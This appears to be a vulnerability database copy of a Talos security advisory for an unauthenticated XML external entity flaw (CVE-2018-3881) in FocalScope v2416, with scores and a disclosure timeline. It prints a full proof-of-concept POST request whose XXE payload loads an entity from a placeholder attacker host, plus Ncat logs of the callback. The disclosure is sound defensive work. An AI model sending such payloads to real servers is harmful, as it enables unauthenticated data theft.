Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
talosTalos IntelligenceTALOS-2018-0559
HistoryJul 20, 2018 - 12:00 a.m.

FocalScope XML External Entity Injection Vulnerability

2018-07-2000:00:00
Talos Intelligence
www.talosintelligence.com
54

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

0.008 Low

EPSS

Percentile

81.3%

JSON

Summary

An exploitable unauthenticated XML external injection vulnerability was identified in FocalScope v2416. A unauthenticated attacker could submit a specially crafted web request to FocalScope’s server that could cause an XXE, and potentially result in data compromise.

Tested Versions

FocalScope v2416

Product URLs

<http://www.focalscope.com/download.html&gt;

CVSSv3 Score

9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

CWE

CWE-611: Improper Restriction of XML External Entity Reference (‘XXE’)

Details

FocalScope v2416 and prior is vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:

POST /emm/_cros_/xlogin.asp HTTP/1.1
Host: [IP]
Content-Length: 315
Origin: http://[IP]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Accept: /
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

	&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"&gt; %remote;%int;%trick;]&gt;&lt;body&gt;&lt;o i='msg'&gt;<s>url:xlogin.asp</s><s>GetSalt</s>&lt;o i='oParam'&gt;<s>PCSL</s><s>self</s><s>PutSalt</s>&lt;/o&gt;&lt;/o&gt;&lt;/body&gt;

	On the attacking Server the following request can be observed: 
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.0
Accept: /
UA-CPU: AMD64
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: x.x.x.x
Connection: Keep-Alive

Note: It was also observed that pretty much any page which takes XML input in POST request is vulnerable to this vulnerability, regardless of whether pages are protected by authentication or not.

Timeline

2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release

Related

prion 1
cvelist 1
cve 1
nvd 1
prion
prion
Xxe
2018-08-01 20:29:00
cvelist
cvelist
CVE-2018-3881
2018-07-20 00:00:00
cve
cve
CVE-2018-3881
2018-08-01 20:29:00
nvd
nvd
CVE-2018-3881
2018-08-01 20:29:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

0.008 Low

EPSS

Percentile

81.3%

JSON
Related for TALOS-2018-0559
prion1cvelist1cve1nvd1